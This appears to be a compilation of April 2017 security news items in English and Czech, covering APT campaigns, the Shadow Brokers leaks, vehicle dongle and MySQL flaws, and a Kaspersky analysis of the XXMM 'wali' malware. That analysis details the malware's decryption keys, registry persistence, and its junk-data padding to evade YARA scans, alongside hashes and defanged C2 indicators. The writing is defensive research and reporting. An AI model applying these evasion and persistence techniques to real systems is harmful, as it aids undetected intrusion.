Numerous malicious spam campaigns observed in the first quarter abused password-protected Office documents, in an attempt to evade auto analysis sandboxes, Malwarebytes also notes. Recently, the Ursnif banking Trojan was observed using such documents in multiple campaigns worldwide.
Callisto APT Group exploited Hacking Team surveillance tools to hack Government targets
16.4.2017 securityaffairs APT
The Callisto APT Group borrowed the source code leaked by hackers that broke into Hacking Team network.
According to F-Secure Labs, The Callisto APT Group used the HackingTeam leaked surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.
The Callisto APT group targeted government officials, military personnel, journalists and think tanks since at least 2015.
F-Secure is still investigating the case, the experts of the company reported that the Callisto Group’s infrastructure has links with entities in China, Russia, and Ukraine.
The researchers speculate the attacker is a nation state actor:
“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”
Callisto APT group
The Callisto APT Group was involved in highly targeted phishing attacks using a malware that is a variant of the Scout tool from the RCS Galileo developed by the surveillance firm HackingTeam.
The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not utilize the leaked RCS Galileo source code, but rather attackers used the leaked readymade installers to set up their own installation of the RCS Galileo platform.
“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”
According to the group, the Callisto APT continues to be active, the experts observed the last malware in February 2016, meanwhile, they continue setting up new phishing infrastructure on weekly bases.
Let me suggest reading the report on the Callisto APT Group that is full of interesting info, including IoCs and mitigation strategies.
Facebook dismantled a huge spam campaign leveraging bogus accounts
16.4.2017 securityaffairs Social
Facebook disrupted an international spam campaign leveraging on bogus accounts used to create “likes” and bogus comments.
The security team at Facebook has disrupted an international spam operation after a six months investigation. The company has neutralized a coordinated campaign that was leveraging on bogus accounts used to create inauthentic likes and comments.
“Today we are taking another step to disrupt a spam operation that we have been combating for six months. It is made up of inauthentic likes and comments that appear to come from accounts located in Bangladesh, Indonesia, Saudi Arabia, and a number of other countries.” states a blog post published by Facebook.”We found that most of this activity was generated not through traditional mass account creation methods, but by more sophisticated means that try to mask the fact that the accounts are part of the same coordinated operation.”
The intent of the campaign was to deceptively increase their social network by adding new friend connections by liking and interacting primarily with popular publisher Pages on Facebook. The attacker used their network of connections to send out spam messages. A huge number of bogus accounts became dormant after liking a number of Pages, “suggesting they had not been mobilized yet to actually make connections and send spam to those people.”
Systems at Facebook were able to identify the fraudulent activities and to remove a significant volume of inauthentic likes, even if attackers used tricks to avoid detection such as the traffic redirection through “proxies” that disguised their location.
“By disrupting the campaign now, we expect that we will prevent this network of spammers from reaching its end goal of sending inauthentic material to large numbers of people.” continues Facebook.
spam campaign
As result of the Facebook activity, the experts at the company expect that 99% of impacted Pages with more than 10,000 likes will see a drop of less than 3%.
Facebook confirmed security improvement to its system to prevent any abuse of its platform, social networks are today privileged attack vectors for crooks.
“We’ve found that when people represent themselves on Facebook the same way they do in real life, they act responsibly,” said Shabnam Shaik, a company security manager.
“Fake accounts don’t follow this pattern, and are closely related to the creation and spread of spam.”
Flaws in the Bosch Drivelog Connector dongle could allow hackers to halt the engine
16.4.2017 securityaffairs Vulnerebility
Security experts discovered vulnerabilities in the Bosch Drivelog Connector dongle that could be exploited by hackers to stop the engine.
Security Researchers at automotive cybersecurity firm Argus discovered vulnerabilities in Bosch Drivelog Connect solution that can be exploited by hackers to inject malicious messages into a vehicle’s CAN bus.
The Bosch Drivelog Connect is the system that provides information about the state of a vehicle, it includes the Drivelog Connector dongle.
The Drivelog Connector dongle is connected to the OBD2 diagnostics interface of the vehicle, and a mobile application communicates with it via Bluetooth.
The researchers analyzed the protocol of communication between the mobile app and the dongle and identified two potentially serious vulnerabilities.
“The vulnerabilities allowed us to stop the engine of a moving vehicle using the Drivelog platform. On February 20th, 2017, in accordance with Argus’ responsible disclosure policy, upon uncovering the vulnerabilities we informed Bosch of our findings. On February 21st, 2017, Bosch’s Product Security Incident Response Team (PSIRT) contacted Argus and began addressing the issue.” reads the analysis published by Argus.
“In summary, the following two vulnerabilities were found:
An information leak in the authentication process between the Drivelog Connector Dongle and the Drivelog Connect smartphone application.
Security holes in the message filter in the Drivelog Connector dongle.”
One of the vulnerabilities affects the authentication process between the Drivelog Connector and the Drivelog Connect mobile app. The experts have analyzed the Android version of the mobile app.
The second flaw resides in the message filter in the Drivelog Connector dongle.
According to researchers, diagnostic messages can only be sent to the CAN bus using a valid service ID, but the attacker can use OEM-specific messages that pass the filter in order to have a physical effect on the car.
An attacker with root privileges on the driver’s mobile phone can leverage this message filter bypass to send malicious CAN messages outside of the scope a small subset of diagnostic messages (i.e., OBDII PIDs).
According to Argus, during the tests, its researchers managed to remotely stop the engine of a moving car by triggering the vulnerability.
Car vendors highlight that such kind of attack is very hard to prevent because attackers have taken over the smartphone of the legitimate driver.
Researchers from Argus have gone beyond, they devised a method to launch the attack without compromising the driver’s smartphone.
The experts discovered an information disclosure vulnerability in the authentication process between the app and the dongle that could be exploited by an attacker to connect to a targeted device without compromising the phone first.
Analyzing the authentication process, researchers discovered the dongle sends any connecting Android device various pieces of information that can be used to obtain the user-supplied authorization PIN.
The amount of data is enough to guess the PIN offline through a brute-force attack only limited in the number of possible PINs.
“Since, a Drivelog Dongle’s PIN has eight digits, there are 100 million possible PINs. A single verification requires a SHA256 calculation and a public key encryption operation. The calculations can be trivially parallelized – but the reality is, there’s no need: a modern laptop can run 100 million SHA256 computations and encryptions in roughly 30 minutes (according to independent benchmarks for the Ed25519 public-key signature system) using properly optimized software.” reads the analysis. “The time needed can be further reduced by running several brute-forcing servers in parallel.”
Once the connection has been established, the attacker can send malicious CAN bus messages from their device, instead of having to compromise the driver’s smartphone, the only limitation if that the hacker needs to be in a Bluetooth range of the targeted vehicle.
Bosch fixed the issues by introducing two-step verification in the authentication process.
“The improper authentication vulnerability in the Bluetooth communication has been mitigated by activating a two-step verification for additional users to be registered to a device. This has been implemented on the server, so no action is required by the user. To further increase security in the authentication process an application and dongle firmware update will also be released.” states the advisory published by the Bosch.
The company plans to release a firmware update for the Drivelog Connector dongle to prevent such kind of attacks.
The security is still secure
16.4.2017 Kaspersky Safety
The WikiLeaks report and Kaspersky Lab's products
Recently WikiLeaks published a report that, among other things, claims to disclose tools and tactics employed by a state-sponsored organization to break into users’ computers and circumvent installed security solutions.
The list of compromised security products includes dozens of vendors and relates to the whole cybersecurity industry. The published report includes a description of vulnerabilities in software products that can be used to bypass protection and jeopardize users’ security.
Customers’ security is a top priority for Kaspersky Lab, and as such we take any information that could undermine users’ protection very seriously. We thoroughly investigate all reported vulnerabilities.
The published report contains descriptions of two vulnerabilities in Kaspersky Lab’s products that have already been fixed. It also includes a number of mentions related to the company’s technologies and past Advanced Persistent Threat (APT) research. I’d like to take this opportunity to address possible concerns regarding the report and provide reliable first-hand information to demonstrate that no current Kaspersky Lab products and technologies are vulnerable.
Vulnerabilities in security solutions
First of all, I’d like to emphasize that the vulnerabilities in Kaspersky Lab’s products listed in the report are related to older versions of the products, and they were publicly disclosed and fixed some time ago. The current versions of our products are not vulnerable to the tools and tactics listed.
The “heapgrd” DLL inject vulnerability was discovered and fixed in Kaspersky Lab products back in 2009. The vulnerability allowed a malefactor to load a third-party DLL instead of the WHEAPGRD.dll file and thus bypass protection. It was patched starting with Kaspersky Internet Security 9 and Kaspersky Antivirus for Workstations MP4. The products that were mentioned in relation to these vulnerabilities (Kaspersky Internet Security 7 and 8 and Kaspersky Antivirus for Workstations MP3) are outdated and no longer supported. All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release.
The TDSS Killer’s DLL inject vulnerability mentioned in the WikiLeaks report was fixed in 2015.
Product behavior specifics
The report also says Kaspersky Lab’s security solutions do not block DLL injections into user processes and svchost.exe. In fact, we do protect against this sort of attack — in a smarter way that elegantly combines protection and a better user experience.
Nowadays, it’s common practice for legitimate applications to inject their code into user processes. To effectively distinguish legitimate from malicious actions, track changes, and restore unwanted amendments an application may make to the system, Kaspersky Lab’s products have included the System Watcher component since 2011. System Watcher monitors all processes on a device, including svchost.exe, and is capable of detecting malicious behavior, blocking it, and rolling back malicious changes.
The report also describes several tools and malicious programs that were used to collect data and infiltrate the users’ computers. However, all of them can be neutralized with Kaspersky Lab’s products. Let’s take a closer look at them.
First, the RickyBobby fileless Trojan is allegedly not detected by Kaspersky Lab’s products, which is not the case. All personal and enterprise level products can detect this Trojan, prevent the infection, and disinfect a system that was protected by a third-party or outdated security solution.
Second, the report mentions two other malware samples (Fine Dining and Grasshopper) that allegedly are not detected by Kaspersky Lab’s products. However, the report doesn’t provide further details of the malware. We will keep investigating the issue and report the findings as soon as details are available.
That said, we are skeptical: It’s said Fine Dining relies on the aforementioned DLL inject vulnerability in TDSS Killer, which is already fixed. Also it’s worth mentioning that Kaspersky products provide multiple layers of protection — such as emulation, heuristics, System Watcher, and Automatic Exploit Prevention — including those powered by industry-leading machine learning. These technologies are capable of detecting cyberthreats proactively based on their behavior and are constantly improved to address new techniques employed by malicious actors. The analysis of the report makes us optimistic that our customers are already protected against both Fine Dining and Grasshopper.
Third, the report mentions HammerDrill, API Memcry, and Trojan Upclicker, which use a variety of techniques to try to avoid detection by the emulator technology.
Kaspersky Lab’s emulator’s history dates back to the early 90s. It’s rated one of the best in the cybersecurity industry, and it’s continuously improved. The functionality to address the described Trojan Upclicker cloaking method was included in the emulator more than a year ago, for example. The other two tools are effectively managed by the multilayer protection available in Kaspersky Lab’s products both for home users and enterprise customers.
Fourth, the report mentions an MBR File Handle component that is able to circumvent security solutions’ drivers and thus upload malware into the Master Boot Record of the operating system.
In fact, this trick is foiled by the antirootkit technology included in Kaspersky Lab products, which enables them to reliably detect and remove infections — even the most advanced bootkits.
Fifth, another tool mentioned in the report is the Bartender program, which collects data on installed software. This functionality is not malicious and is used by many legitimate applications. However, Kaspersky Lab’s products do provide protection against such activity should a user select the high security level setting.
Fun facts
The other two mentions of Kaspersky Lab in the context of malware creation are actually fun facts.
First, the tool called DriftingShadows checks if Kaspersky Lab’s products are installed on the device, and if it finds them, it does … nothing. This means that the malware creators failed to sneak past our products. They now avoid protected devices so that their malware doesn’t get caught.
Second, the documents also describe a game called “Bonus: Capture the Flag” played among malware creators. It involves attempts to create a malware sample that bypasses Kaspersky Lab’s protection. In other words, malefactors consider our products a gold standard of cybersecurity.
Wrap-up
Investigating the existing report thoroughly, we found two vulnerabilities and several other mentions of Kaspersky Lab, including discussions regarding our reports on the Duqu 2.0 and Equation cyberespionage campaigns. Both vulnerabilities were fixed quite some time ago and pose no threat to our customers. The same goes for the other malicious tools and techniques mentioned.
However, we are staying vigilant and continuously monitoring the situation. WikiLeaks may yet publish more details. In any case, we’d like to reassure customers that addressing any possible vulnerabilities will be our top priority.
No development process guarantees immediate, perfect, permanent invincibility. We are committed to constantly improving the development process, and we also make significant efforts to perfect the process of fixing newly discovered vulnerabilities.
Old Malware Tricks To Bypass Detection in the Age of Big Data
16.4.2017 Kaspersky Virus
Kaspersky Lab has been tracking a targeted attack actor’s activities in Japan and South Korea recently. This attacker has been using the XXMM malware toolkit, which was named after an original project path revealed through a pdb string inside the file: “C:\Users\123\documents\visual studio 2010\Projects\xxmm2\Release\test2.pdb”. We came across an unusual technique used by a sample which contained no pdb strings but was very similar to a variant of XXMM malware in terms of code similarity, malware functionality, crypto-algorithm, data structures and module configuration.
The malware sample we observed was named “srvhost.exe” to resemble a standard system process name. It came from one of our partners at the beginning of 2017. One of the most surprising features of the malware was its file size, which is not commonly seen in malware – it was over 100MB. According to our analysis, this malware is a Trojan loader component that activates a backdoor. We could not confirm pdb strings from this malware, however the backdoor module seems to be named “wali” by the author, according to strings from the embedded config block.
Fig. config strings with “[wali]” section
Fig. “wali.exe” name in the malware body
The wali loader decrypts the embedded wali backdoor using the “\x63” byte and a simple XOR operation. The XOR key is not only “\x63”, we confirmed others. Then, the wali backdoor module is injected into the memory of the iexplore.exe process by the loader.
What is inside the wali loader that makes it so big in size? The reason is that this sample has a very big overlay of junk data. We found more than 20 other similar samples (wali loader + overlay) using open source intelligence and by searching our malware collection using YARA rule. After removing the overlay, there were only six unique samples.
md5_payload md5_payload+overlay size
d1e24c3cc0322b22988a1ce366d702e5 8bd0ddeb11518f3eaaddc6fd82627f33 105982049
e4811950899f44f9d14a786b4c5b1faa 2871ec229804a6e872db55dafa5c9713 105997178
3e24710d7ade27316d367dd8cb2a0b1a 105996860
3e9feea893482b65a68b1feecb71cd4d 105997043
558ca7fa8ed632fa4f8c69e32888af0f 105997191
d11f7b25823ce474e30e8ab9c8d567b0 105996847
f4c3f06faf53ad2bbc047818344a2323 105997181
f7cc6a5a06cd032c6172d14c1568b976 105997102
e7492f11c88d32e1e0b43f6b29604ec8 6a5558e4ab530f9b5c2d5bcc023d3218 105997658
bb8cef31cf6211c584d245be88573e1f 105997755
Table. Some samples of 100M+ bytes wali loader + overlay
The overlay data is generated by the wali dropper when the wali loader is installed onto the victim’s machine. The following figure shows the structure of malware components and how they are related to each other:
Fig. Structure of wali modules
Wali dropper1 checks the CPU architecture. If the CPU is 64-bit, this malware decrypts the 64-bit version of the wali loader from resource id 101. Otherwise, it decrypts the 32-bit version of the wali loader from resource id 102. To extract the resource data it uses RC4 with “12345” as the cryptokey, and LZNT1 to decompress the data after that. Dropper1 creates a file named “win${random4 chr}.tmp.bat” in the current temp directory from the decrypted wali dropper2 data. Finally, it appends generated garbage data to the overlay of the dropped file and runs wali dropper2
Wali dropper2 checks if the user account has admin privileges, and decrypts the wali loader using the same algorithm and the same key as of dropper1, and creating new files using the following file paths:
%ProgramFiles%\Common Files\System\Ole DB\srvhost.exe
%appdata%\Microsoft\Windows\Start Menu\Programs\srvhost.exe
It also appends generated garbage data to the overlay as well, using the same function. Finally, it creates a registry value of “sunUpdate” in “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” to ensure malware persistence.
Generation of Junk Data
The feature to appending junk data to the malware executable to inflate the file size is quite unique to wali dropper1 and wali dropper2. We assume that by creating a large file the authors wanted to avoid AV detection, complicate sample exchange and stay below the radar of the most commonly used YARA rules. The function that generates the junk data is shown below:
Fig. Function to create junk data (create_garbage_data).
The create_garbage_data function generates a random byte in a loop with 1,000 iterations. In every iteration it fills blocks of data of random length within certain dynamically calculated limits. After that the result of create_garbage_data is written to the overlay of the decrypted wali loader and the process is repeated 100 times. This produces junk data of ~100MB which is appended to the executable.
Fig. Loop to append the junk data to overlay.
The size of one wali loader (MD5: d1e24c3cc0322b22988a1ce366d702e5) was initially 1,124,352 bytes. The function that appends garbage produced a new malware file in a real attack (MD5: 8bd0ddeb11518f3eaaddc6fd82627f33) and the file size was increased to 105,982,049 bytes.
As the appended junk data is created dynamically and depends on random values, the size of it may vary. We have seen 100MB files as well as 50MB samples used in real world attacks. The largest we observed was a 200MB malware sample created with the same trick. This technique currently doesn’t affect detection of the malware by Kaspersky Lab products. The malware is detected as:
Trojan.Win32.Xxmm
Trojan.Win64.Xxmm
Trojan-Downloader.Win32.Xxmm
Trojan-Downloader.Win64.Xxmm
Trojan-Dropper.Win32.Xxmm
Trojan-Dropper.Win64.Xxmm
Inflating file size with garbage data is not a completely new technique. Previously polymorphic viruses and worms used this technique a lot to mix original code with garbage data spread across the malware file, sometime increasing the file size by hundreds of kilobytes and even megabytes. Certain software protectors may also insert decoy files into packed files and inflate file size up to 1MB. We have also seen executable malwares disguised as movie files and ISO files spread over torrents, which in these cases, the malware size is inflated to a few gigabytes in order to mimic true content .
What is quite unique in using this method and appending junk data to a file is that in this case this technique is used in targeted attacks and is happening after the initial infection, during the later phases of attack with the intention of increasing file size to avoid detection.
While this technique may seem inefficient in its primitive approach to bypass detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan harddrives. The reason is that one of the common practices for YARA rule authors is to limit the size of scanned files, which is aimed mainly at improving performance of the scanning process. Large files, like the ones produced by XXMM malware, may become invisible for such rules, which is why we would like to recommend security researchers to consider this when creating rules for dropped malwares.
Indicators of Compromise
SHA256sum of samples
Wali dropper1:
9b5874a19bf112832d8e7fd1a57a2dda180ed50aa4f61126aa1b7b692e6a6665
Wali dropper2:
da05667cd1d55fa166ae7bd95335bd080fba7b53c62b0fff248ce25c59ede54a
10fca84ae22351356ead529944f85ef5d68de38024d4c5f6058468eb399cbc30
Wali loader + overlay:
1f73d3a566ab7274b3248659144f1d092c8a5fc281f69aa71b7e459b72eb6db2
24835916af9b1f77ad52ab62220314feea91d976fdacad6c942468e20c0d9ca1
303c9fabf6cff78414cebee9873040aeb9dcf6d69962bd9e0bbe1a656376ed16
3ffd5d3579bddbfd7136a6969c03673284b1c862129cfafe7a40beea1f56e790
803a5a920684a5ab1013cb73bf8581045820f9fc8130407b8f81475d91ff7704
d2126d012de7c958b1969b875876ac84871271e8466136ffd14245e0442b6fac
d7b661754cae77aa3e77c270974a3fd6bda7548d97609ac174a9ca38ee802596
dc5e8c6488f7d6f4dcfac64f8f0755eb8582df506730a1ced03b7308587cdc41
f4a07e6dcb49cb1d819c63f17a8250f6260a944e6e9a59e822e6118fb1213031
ffd45bde777b112206b698947d9d9635e626d0245eb4cfc1a9365edc36614cbe
Wali loader:
a24759369d794f1e2414749c5c11ca9099a094637b6d0b7dbde557b2357c9fcd
b55b40c537ca859590433cbe62ade84276f3f90a037d408d5ec54e8a63c4ab31
c48a2077e7d0b447abddebe5e9f7ae9f715d190603f6c35683fff31972cf04a8
725dedcd1653f0d11f502fe8fdf93d712682f77b2a0abe1962928c5333e58cae
cfcbe396dc19cb9477d840e8ad4de511ddadda267e039648693e7173b20286b1
C2 (compromised web sites) of wali:
hXXp://******essel[.]com/mt/php/tmpl/missing.php
hXXp://******essel[.]com/mt/mt-static/images/comment/s.php
hXXp://******hi[.]com/da******/hinshu/ki******/ki******.php
hXXp://******an[.]jp/_module/menu/menug/index.php
hXXp://******etop.co[.]jp/includes/firebug/index.php
hXXp://******etop.co[.]jp/phpmyadmin/themes/pmahomme/sprites.html
hXXp://******usai[.]com/ex-engine/modules/comment/queries/deleteComment.php
hXXp://******1cs[.]net/zy/images/patterns/preview/deleteComments.php
hXXp://******1cs[.]net/zy/images/colorpicker/s.php
Filename (over 50MB size):
srvhost.exe
propsyse.exe
perfcore.exe
oldb32.exe
oledb32.exe
javaup.exe
NSA podle hackerů nabourala bankovní systém SWIFT
15.4.2017 Novinky/Bezpečnost BigBrother
Skupina hackerů zvaná Shadow Brokers zveřejnila v pátek dokumenty budící podezření, že americká Národní agentura pro bezpečnost (NSA) dokázala proniknout do bankovní sítě SWIFT, sloužící k mezinárodním převodům. Oznámily to v sobotu tiskové agentury.
Mnozí experti považují únik údajů za věrohodný, přestože dotčené firmy a instituce jej popřely, anebo se odmítly vyjádřit, uvedla na svém webu stanice BBC pod titulkem "Vláda Spojených států 'nabourala globální bankovní systém'". NSA se nevyjádřila.
NSA údajně prostřednictvím přísně tajné jednotky počítačových pirátů sledovala především blízkovýchodní banky kvůli případným transakcím teroristů – a prý využila slabin v produktech firmy Microsoft, používaných v počítačích po celém světě, uvedla agentura AFP.
SWIFT (Society for Worldwide Interbank Financial Telecommunication - Společnost pro celosvětovou mezibankovní finanční telekomunikaci) slouží zejména k mezinárodnímu platebnímu styku. Jde o počítačově řízený systém pro dálkový přenos dat mezi bankami a dalšími finančními i nefinačními institucemi. V rámci SWIFTu má každá zúčastněná banka svůj jedinečný kód, kterým se identifikuje - BIC. Zdroj: Wikipedia
„Nezaznamenali jsme žádné známky neoprávněného přístupu do naší sítě či do služby přenosu zpráv,” tvrdí SWIFT sídlící v Belgii. BBC připomněla, že hackeři systém úspěšně napadli, když loni zločinci ukradli bangladéšské ústřední bance 81 miliónů dolarů (asi dvě miliardy Kč).
Slabiny za padesát miliónů
Dubajská kancelář EastNets, sloužící při převodech blízkovýchodním bankám, zprávu o svém údajném nabourání popřela jako "zcela falešnou a nepodloženou".
Microsoft prostřednictvím blogu svého manažera pro bezpečnost Phillipa Misnera ujistil své zákazníky, že jsou v bezpečí, pokud si své počítačové programy řádně aktualizují. Programový gigant už vyvinul obranu v případě devíti z 12 nástrojů zmíněných hackery, zbývající tři představují zastaralé a nepodporované výrobky.
Zmíněné "bezpečnostní slabiny" by podle BBC mohly na černém trhu vynést více dva milióny dolarů (asi 50 miliónů Kč).
Follow
Edward Snowden ✔ @Snowden
The Mother Of All Exploits escaped from an NSA laboratory and is wrecking the internet. https://motherboard.vice.com/en_us/article/your-governments-hacking-tools-are-not-safe …
12:54 AM - 15 Apr 2017
Photo published for Your Government's Hacking Tools Are Not Safe
Your Government's Hacking Tools Are Not Safe
From Cellebrite, to Shadow Brokers, to the CIA dump, so many recent data breaches have shown there is a real risk of exposure of government hacking tools.
motherboard.vice.com
2,711 2,711 Retweets 2,943 2,943 likes
Pokud tato odhalení odpovídají pravdě, jsou podle BBC nejvážnější od dob bývalého spolupracovníka amerických rozvědek Edwarda Snowdena, který informoval o rozsahu globálního špehování v roce 2013. Ten na svém twitterovém účtu označil čin NSA za „mother of all exploits”, tedy matku všech zneužití bezpečnostních trhlin, a to s jasným odkazem na čtvrteční svržení nejsilnější americké nejaderné bomby na Afghánistán, které se přezdívá matka všech bomb.
Pětina uživatelů sociálních sítí si nikdy nezměnila heslo ke svému účtu
15.4.2017 Novinky/Bezpečnost Sociální sítě
Heslo ke svému účtu si nikdy nezměnila pětina uživatelů sociálních sítí. Více než polovina lidí tak navíc neučinila za poslední rok, vyplývá z průzkumu společnosti Thycotic. Profily na Facebooku, Twitteru či LinkedInu tak zbytečně vystavují útokům.
Heslo patří k nezranitelnějším bodům komunikace na internetu. Pokud není dostatečně silné nebo ho uživatel pravidelně nemění, riskuje tím značné problémy. „Jak víme, sociální sítě obsahují spoustu soukromých informací. Když uživatelé pravidelně nemění přístupová hesla k jejich Facebooku, Twitteru nebo LinkedInu, usnadňují tak hackerům přístup k důvěrným informacím, včetně možnosti průniku do jejich pracovních počítačů a e-mailů,“ říká Joseph Carson, vedoucí týmu bezpečnostních analytiků Thycoticu.
Z průzkumu této společnosti vyplynulo, že 53 procent uživatelů si za poslední rok nezměnilo přístupové heslo k účtům na sociálních sítích. Více než čtvrtina respondentů přiznala, že mění svá hesla v práci pouze ve chvíli, kdy je k tomu automaticky vyzve firemní systém. Stejné výzvy ale u sociálních sítí zcela chybí. „Provozovatelé sociálních sítí by měli nabízet možnost upozornění na stáří a sílu hesla nebo o osvědčených postupech, jak si takové silné heslo vytvořit,“ míní Joseph Carson.
Selhávají také IT profesionálové
Ležérní přístup k heslům v průzkumu přiznali i profesionálové, kteří se zabývají bezpečností v oblasti IT. Téměř 30 procent z nich používá jako heslo datum narození, svoji adresu nebo jméno domácího mazlíčka. „Fakt, že lidé, kteří se den co den zabývají problematikou zabezpečení firemního IT, používají slabá hesla, je šokující a nepřijatelný,“ kritizuje je generální ředitel Thycotic James Legg. „Průzkum jasně ukazuje, jak zranitelná je spousta lidí, kteří ohrožují sami sebe nebo společnost, pro kterou pracují, svým nezodpovědným přístupem k heslům.“
Vytvořit bezpečné a silné heslo přitom není nic složitého. „Mělo by obsahovat alespoň osm znaků a měla by se v něm střídat velká a malá písmena, číslice a další znaky,“ popisuje Miroslav Dvořák, technický ředitel společnosti ESET. Podle jeho slov je důležité používat pro každý internetový účet unikátní heslo. „Je pravda, že služeb, ke kterým potřebujeme heslo, neustále přibývá a je těžké si všechna hesla zapamatovat. Proto je dobré využívat nástroj správce hesel, který je standardní součástí kvalitního bezpečnostního softwaru,“ dodává Dvořák.
Jenom za loňský rok byly na celém světě odcizeny tři miliardy hesel, což znamená, že za každou vteřinu hackeři ukradli 95 hesel. Počet hesel používaných firmami i uživateli bude nadále narůstat. V roce 2020 připadne podle společnosti Thycotic na jednu firmu více než 300 hesel a každý zaměstnanec zodpovědný za bezpečnost firemního IT bude zodpovědný za správu 90 hesel.
Turns Out Microsoft Has Already Patched Exploits Leaked By Shadow Brokers
15.4.2017 thehackernews Vulnerebility
The latest dump of hacking tools allegedly belonged to the NSA is believed to be the most damaging release by the Shadow Brokers till the date.
But after analyzing the disclosed exploits, Microsoft security team says most of the windows vulnerabilities exploited by these hacking tools, including EternalBlue, EternalChampion, EternalSynergy, EternalRomance and others, are already patched in the last month's Patch Tuesday update.
"Most of the exploits that were disclosed fall into vulnerabilities that are already patched in our supported products. Customers still running prior versions of these products are encouraged to upgrade to a supported offering," Microsoft Security Team said in a blog post published today.
On Good Friday, the Shadow Brokers released a massive trove of Windows hacking tools allegedly stolen from NSA that works against almost all versions of Windows, from Windows 2000 and XP to Windows 7 and 8, and their server-side variants such as Server 2000, 2003, 2008, 2008 R2 and 2012, except Windows 10 and Windows Server 2016.
The hacking exploits could give nearly anyone with technical knowledge the ability to break into millions of Windows computers and servers all over the Internet, but those which are not up-to-date.
"Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk." Microsoft says.
The data dump also includes some top-secret presentations and excel sheets, indicating that the leaked exploits may have been used to hack the SWIFT banking system of several banks across the world.
Even though NSA exploits are patched, the Shadow Brokers leak is still big, which provides info on NSA targeting SWIFT Networks
CLICK TO TWEET
Hacking tool, called Eternalromance, contains an easy-to-use interface and exploits Windows systems over TCP ports 445 and 139.
The most noteworthy exploit in the Friday's dump is Eternalblue — an SMBv1 (Server Message Block 1.0) exploit that could cause older versions of Windows to execute code remotely.
Matthew Hickey, a security expert and co-founder of Hacker House, also published a video demonstration, using this exploit against a computer running Windows Server 2008 R2 SP1 and pulling off the hack in less than 2 minutes with another alleged zero-day FuzzBunch, which is being used to compromise a virtual machine running Windows Server 2008.
But if the company already patched this flaw last month, then how could this exploit works against an updated machine? It seems like the researcher tried this exploit against a Windows PC without installing the latest updates.
"The patches were released in last month's update, I tested on a fully patched Windows 2008 R2 SP1 (x64), so many hosts will be vulnerable - if you apply MS17-010 it should protect hosts against the attacks," Matthew clarifies during a conversation with The Hacker News.
No Acknowledgement for SMB RCE Issue by Microsoft
There's also news floating around the Internet that the "NSA has had, at a minimum, 96 days of warning," knowing that the Shadow Brokers could drop the files at any time, but the agency did not report the flaws to Microsoft.
The Intercept also reported that Microsoft told it that the company had not been contacted by any "individual or organization," in relation to the hacking tools and exploits released by the Shadow Brokers.
The vulnerabilities have already been patched by Microsoft, which acknowledges all security researchers for reporting the issues in its products, but, interesting, there are no acknowledgments for MS17-010 which patched most of the critical flaws from the Shadow Brokers dump.
It’s noteworthy, there’s no acknowledgement for recently patched MS17-10 SMB flaw on Microsoft (used in Eternalblue)
CLICK TO TWEET
This indicates that someone from the agency or linked with defense contractor might have warned the company of the SMB RCE issue.
So, only those who are still using Windows XP, which Microsoft doesn't support for very long, are at risk of getting their machines hacked.
And there is no need to panic if you use updated Windows 7, 8 or 10 (or even Windows Vista, whose support ended just last week and the issue was patched last month).
The simple advice for you is to always keep your Windows machines and servers up-to-date in order to prevent yourself from being hacked.
Watch out, the Riddle vulnerability affects some Oracle MySQL versions. Update them now
15.4.2017 securityaffairs Vulnerebility
A bug dubbed Riddle vulnerability affecting MySQL 5.5 and 5.6 clients exposed user credentials to MiTM attacks. Update to version 5.7.
A coding error dubbed The Riddle has been uncovered in the popular DBMS Oracle MySQL, the issue can be potentially exploited by attacker powering a man-in-the-middle attack to steal usernames and passwords.
“The Riddle is a critical security vulnerability found in Oracle’s MySQL 5.5 and 5.6 client database libraries. The vulnerability allows an attacker to use riddle in the middle for breaking SSL configured connection between MySQL client and server.” states the description of the flaw.“This vulnerability is a very critical security hole because it affects MySQL — a very popular SQL database — and SSL connection which is by its definition secure.”
The flaw, tracked as CVE-2017-3305, potentially exposes login credentials to eavesdropping, an attacker can capture them when a MySQL clients 5.5 and 5.6 send them to servers.
A security update released for the versions 5.5.49 and 5.6.30 failed to completely fix the bug. The experts noticed that the Versions 5.7 and later, as well as MariaDB systems, are not affected by this issue.
According to security researcher Pali Rohár, the Riddle vulnerability results for the failed attempt to patch the BACKRONYM vulnerability affecting the MySQL database. The Backronym vulnerability exposes passwords to attackers who are in a position to run a man-in-the-middle attack, even if the traffic is encrypted.
“Security update for the stable MySQL 5.5.49 and 5.6.30 versions consisted of adding a verification of security parameters after the authentication process was finished.” “Since it is done after the authentication, riddle in the middle attack together with SSL-downgrade attack can be used by the attacker to steal login data for immediate authentication and log into the MySQL server,” wrote Rohár.
“Ridiculous part is that MySQL client doesn’t report any SSL-related error when MySQL server declines to authenticate a user and instead reports unencrypted error message send by the server. Furthermore, the error message is controlled by the attacker, when the riddle in the middle attack is active.”
The expert suggests updating the client software to MySQL 5.7 or MariaDB, because the security updates for these applications correctly work.
The Riddle vulnerability was discovered in February, but today the bug still affect the Oracle MySql software.
“Reporting bugs to Oracle is useless (even those which are security related) if you are not an Oracle customer. They can perfectly ignore any reports and they would be very happy if nobody knew about it so they don’t have to fix the bugs,” explains Rohár.
“It looks like immediate public disclosure is the best responsible solution for the users, as it is the only way to protect them and let them know immediately what should be done if they are affected.”
Facebook Disrupts Suspected Spam Operation
15.4.2017 securityweek Social
Facebook on Friday said it disrupted an international fake account operation that was firing off inauthentic "likes" and bogus comments to win friends it would then pound with spam.
